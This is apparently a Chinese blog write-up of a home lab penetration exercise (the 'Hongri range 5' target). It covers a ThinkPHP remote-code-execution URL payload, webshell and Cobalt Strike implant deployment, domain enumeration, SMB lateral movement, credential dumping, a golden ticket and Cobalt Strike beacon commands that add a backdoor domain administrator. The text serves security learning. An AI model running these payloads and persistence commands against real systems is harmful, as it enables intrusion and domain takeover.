内网渗透——红日靶场五

一、前期准备

有win7和win2008两台虚拟机,其中win7双网卡模拟内外网

win7:

sun\heart 123.com

sun\Administrator dc123.com

2008:

sun\admin 2020.com

IP段设为:192.168.57.x(外网 NAT模式) 192.168.52.x(内网 仅主机模式)

win7:192.168.57.150/24 192.168.52.189/24

2008:192.168.52.190/24

win7需要打开phpstudy

二、外网探测

1.存活主机

发现主机:192.168.57.150

2.端口扫描

发现80端口和3306端口

访问80端口服务

3.ThinkPHP命令执行

发现ThinkPHP框架,同时发现php版本为:5.5.38

尝试thinkphp命令执行

http://192.168.57.150/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

写入webshell,这里直接用工具:https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3

getshell

成功拿下win7

4.cs上线

上传msf生成的windows木马文件

用msf进行连接,而当我每次连接时,会发现win7会显示:

并且重连了许多次也没连上,考虑用cs试试,用cs生成windows可执行程序,并上传win7

成功上线!

三、内网渗透

1.内网信息收集

查看网络信息

发现内网网段:192.168.52.189

查看所属域

所属域为:sun.com

查看域内主机

net view

查看域控

得到域控IP:192.168.52.190

端口扫描

扫一下端口,先提升到system权限

发现开了445端口

2.横向移动

新建一个beacon_SMB监听器

成功拿下域控机器

3.权限维持

再抓一下域控机器的hash值和明文密码

创建黄金票据

4.添加域管理员

复制代码
beacon > shell net user syst3m 123qwe.com /add /domain
beacon > shell net user /domain
beacon > shell net group "domain admins" syst3m /add /domain

查看域管理员用户是否添加成功

四、总结

上面建立的域管理员用户以及植入的文件隐蔽性还是不够,后面会对其进行专项学习。学习使用.NET 安全矩阵的工具,再学习一下免杀。

相关推荐
数字冰雹7 小时前
图观 流渲染场景服务器
服务器·前端·数据库·数据可视化
前方一片光明8 小时前
Linux—升级openssh常见的问题与解决方案
linux·运维·服务器
阿巴~阿巴~8 小时前
MySQL复合查询(重点)
服务器·数据库·sql·mysql·ubuntu
珊瑚礁的猪猪侠9 小时前
Nginx从入门到精通:小白实战教程
运维·nginx
wanhengidc9 小时前
云手机在软件资源方面的优势
运维·服务器·网络·游戏·智能手机
野熊佩骑10 小时前
CentOS二进制安装包方式部署K8S集群之系统初始化
运维·docker·微服务·云原生·容器·kubernetes·centos
烦躁的大鼻嘎10 小时前
【Linux】深入探索多线程编程:从互斥锁到高性能线程池实战
linux·运维·服务器·开发语言·c++·算法·ubuntu
霍格沃兹测试开发学社测试人社区10 小时前
Playwright MCP浏览器自动化详解指南
运维·自动化
天空之外13611 小时前
nginx xxs漏铜修复、nginx 域名配置、nginx https证书配置、Http不安全处理方法
运维·nginx
彩旗工作室11 小时前
用 Supabase 打造统一认证中心:为多应用提供单点登录(SSO)
服务器·前端·数据库